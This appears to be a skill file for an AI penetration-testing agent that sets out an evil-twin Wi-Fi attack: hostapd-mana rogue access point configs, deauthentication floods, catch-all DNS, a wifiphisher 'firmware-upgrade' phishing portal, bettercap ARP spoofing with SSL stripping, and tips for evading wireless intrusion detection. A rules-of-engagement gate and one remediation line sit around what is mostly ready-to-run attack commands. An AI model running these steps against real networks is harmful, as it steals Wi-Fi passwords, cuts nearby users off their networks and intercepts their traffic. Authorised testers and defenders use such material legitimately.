| name | evil-twin-karma |
| description | Evil-twin rogue AP with KARMA/Mana PNL-probe response, captive-portal credential capture, and post-association MITM for PSK/open networks. Distinct from wpa-enterprise-eap which targets 802.1X. |
| allowed-tools | Bash Read Write |
| metadata | {"subdomain":"wireless","when_to_use":"evil twin, KARMA, Mana, rogue AP, captive portal, hostapd-mana, wifiphisher, airgeddon, PNL, probe response, client coercion, PSK phishing, open network MITM","tags":["evil-twin","karma","mana","rogue-ap","captive-portal","mitm"],"mitre_attack":"T1557, T1556, T1598"} |
Evil Twin / KARMA / Mana Rogue AP
RoE hard stop (mirrors the wireless workflow loaded into your system prompt):
NEVER bring up an evil-twin AP on public airspace without
permitted_actions: evil_twin recorded in plan/roe.json for
this session. Confirm iw reg get before any TX. This applies
even on posture=loud — explicit operator approval is required.
Prerequisites
- TX-capable adapter (not just monitor mode).
- Tools:
hostapd-mana, wifiphisher (portal templates),
airgeddon (menu-driven alternative), dnsmasq, bettercap.
- Second adapter for deauth (optional but increases coercion speed).
plan/roe.json must contain permitted_actions: evil_twin and
valid regulatory TX authorization.
Step 1 — PNL / probe-request harvest
Preferred-Network List (PNL) probe requests reveal SSIDs a device
will auto-associate to. Passive harvest before standing up the rogue AP:
sudo airodump-ng --output-format csv -w /tmp/probes <mon-iface>
sudo bettercap -iface <mon-iface> \
-eval "wifi.recon on; set wifi.show.sort clients desc; ticker on"
Step 2 — Stand up rogue AP with hostapd-mana
cat > /tmp/mana.conf << 'EOF'
interface=<iface>
driver=nl80211
ssid=<TARGET_SSID>
hw_mode=g
channel=<CHANNEL>
mana_enable=1
mana_credout=/tmp/mana_creds.txt
mana_loud=0
EOF
sudo hostapd-mana /tmp/mana.conf
cat > /tmp/evil_twin_psk.conf << 'EOF'
interface=<iface>
driver=nl80211
ssid=<TARGET_SSID>
hw_mode=g
channel=<CHANNEL>
wpa=2
wpa_passphrase=<KNOWN_PSK>
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
mana_enable=1
mana_credout=/tmp/mana_creds.txt
EOF
sudo hostapd-mana /tmp/evil_twin_psk.conf
Step 3 — Deauth-driven roaming coercion
sudo aireplay-ng --deauth 5 -a <LEGIT_BSSID> -c <CLIENT_MAC> <mon-iface2>
sudo aireplay-ng --deauth 0 -a <LEGIT_BSSID> <mon-iface2>
Step 4 — DHCP + DNS for associated clients
cat > /tmp/dnsmasq.conf << 'EOF'
interface=<iface>
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
address=/#/10.0.0.1
log-queries
EOF
sudo ip addr add 10.0.0.1/24 dev <iface>
sudo ip link set <iface> up
sudo dnsmasq -C /tmp/dnsmasq.conf --no-daemon &
Step 5 — Captive portal credential capture (wifiphisher)
sudo wifiphisher \
--essid "<TARGET_SSID>" \
--channel <CHANNEL> \
-p firmware-upgrade \
--handshake-capture /tmp/wpa2_handshake.pcap
sudo bettercap -iface <iface> \
-eval "
set http.proxy.sslstrip true;
set net.sniff.verbose false;
net.probe on;
arp.spoof on;
http.proxy on;
net.sniff on
"
Step 6 — MAC-randomization defeat
Modern OS (Android 10+, iOS 14+, Windows 10+) use random MACs for
probe requests, complicating targeting:
tshark -r /tmp/probes-01.cap -Y "wlan.fc.type_subtype == 4" \
-T fields -e wlan.sa -e wlan_mgt.ssid -e wlan.seq 2>/dev/null \
| sort -k1,1 -k3,3n > /tmp/probe_seqs.txt
Evidence
kg_add_node(
kind="credential",
label=f"Captive portal PSK for {ssid}",
props={
"key": f"portal-cred::{bssid}::{client_mac}",
"secret_type": "wpa_psk_phished",
"ssid": ssid,
"bssid": bssid,
"client_mac": client_mac,
"psk": psk,
"portal_template": template_name,
"captured_at": "<iso8601>",
"source": "wifiphisher-portal",
},
)
kg_add_node(
kind="finding",
label="Client PNL Probe Leakage — Evil-Twin Viable",
props={
"key": f"pnl-leak::{client_mac}",
"severity": "high",
"exposed_ssids": [<ssid_list>],
"client_mac": client_mac,
"remediation": (
"Enable MAC randomization and disable 'auto-connect' for "
"saved networks. Use WPA3 with Protected Management Frames "
"to prevent deauth-driven roaming."
),
},
)
ZFP
- airodump CSV showing client probe requests for target SSID.
- hostapd-mana log showing client association to rogue AP.
- wifiphisher output or bettercap log showing captured credential.
- (Optional) Pcap of the full association + DHCP + portal flow.
OPSEC notes
- Mana selective is quieter than KARMA universal — only probed SSIDs
get a response, reducing unexpected associations and WIDS alerts.
- Open AP (no PSK) has the fastest client association but exposes the
rogue AP to casual discovery.
- wifiphisher generates detectable management frames; WIDS tuned for
rogue APs will fire. Default posture: loud.
- Deauth coercion amplifies WIDS visibility; use single targeted
deauth (
--deauth 1) over broadcast where possible.
- Tear down the rogue AP immediately after credential capture to
minimize dwell and collateral client disruption.
References
- hostapd-mana: github.com/sensepost/hostapd-mana
- wifiphisher: github.com/wifiphisher/wifiphisher
- airgeddon: github.com/v1s1t0r1sh3r3/airgeddon
- bettercap: bettercap.org
wpa-enterprise-eap skill — use instead for 802.1X/MGT targets.
deauth-pmf skill — PMF detection and targeted deauth mechanics.
wpa3-sae skill — Path D captive portal for SAE networks.